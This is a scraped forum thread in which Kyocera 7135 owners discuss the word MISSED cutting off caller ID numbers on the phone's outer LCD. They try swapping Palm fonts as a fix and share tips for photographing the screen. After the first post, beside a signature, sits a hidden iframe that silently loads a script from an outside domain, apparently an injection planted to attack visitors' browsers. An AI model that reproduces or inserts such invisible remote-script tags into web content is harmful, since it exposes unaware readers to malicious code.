+ Reply to Thread

How can I remove the message feature from the caller ID?

So far I love my 7135, couple of soft resets but nothing major. One problem I have with the unit is the caller ID function. I love being able to see what call I missed, but when I check the outer screen more than half of the number is blocked by the word MISSED.
    Is there any way to remove this?

FuryUSA.com<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't think there is a way to remove it. It is frustrating, especially if it doesn't match something recognizable in your address book. They should have made the message scroll across the display. Plus they could have the message time out so it would return to the time display without opening having to open the phone. Maybe they could have a flashing "M" for missed call. Are you listening Kyocera?
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Mostly Converged
    I have a sorta solution....

The LCD screen on the top of the 7135 uses the same standard fonts as the Palm. But, I have not found out how to control WHICH font is used....<p>

So..

What you need to do to turn this...

into this...

is to install a Palm font (the one I used in my example is the Alpha Roman font from Alpha Fonts 1.7.1 as shown below...

Just install the font, open the battery cover and due a soft reset, and amaze at the LCD change...

Scott
    PS> Sorry for the blurry pictures, but it's hard to do a good capture close up with my camera...
    PPS> I've also put the Alpha Roman font on my site as well.. Get it here!

What happens to the font size of the rest of what is displayed on the LCD? (like the time, caller ID, etc.)
    Please visit my picture site: Robert-O-Rama :)

Mostly Converged
    It is shrunk too. So, if you use a really tiny font, then the LCD becomes two lines tall, and the icons are tiny...

Scott

Originally posted by sck_nogas
    It is shrunk too. So, if you use a really tiny font, then the LCD becomes two lines tall, and the icons are tiny...

Scott
    Is it easy to switch back to the default font?
    Please visit my picture site: Robert-O-Rama :)

That didn't help. It still cut it off the same amount, just was smaller. To remove the font, I just used the file manager and deleted it and then did a soft reset.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Mostly Converged
    Dohh, you're right... I never noticed that before.

Hmmm, let me see if there is anything I can find for it since I may have luck with friends at Kyoi.

Scott

Originally posted by sck_nogas
    PS> Sorry for the blurry pictures, but it's hard to do a good capture close up with my camera...
    Does your camera not have a "macro" setting?
    ~'kito
    pdaPhoneHome Moderator

Mostly Converged
    Okay, I found out, that yes I have a Macro setting on my camera, but the captures are still blurry... But, although the number of characters are still limited, we can do other fonts. Like these images of the clocks...

Or these (somewhat blurry) Missed calls from "Home"

Scott

Will that display the full number of a missed call? could you try it with a number that your phone book doesnt recognize. Mine only gets to about 5 digits, 3 being the area code, its pretty frustrating

chet

Mostly Converged
    That's the current problem...

The number of characters is limited by the LCD, and thus, when it says [Missed: XXXX...] You only have those 4 characters.

Scott

[OT] picture suggestions

Your "macro" setting should also have a recommended (fixed?) distance from lens to subject. Then you should *not* be holding the camera in your hands. Tripod or table. Finally, use the timer to take the picture so you don't jiggle the camera by pushing the button. I suspect that you are not using a flash and the light is low (so that you can take a pic of the LCD, naturally). This means that the camera may/will adjust with a slow shutter speed making a still camera all that much more of a factor.

-Quick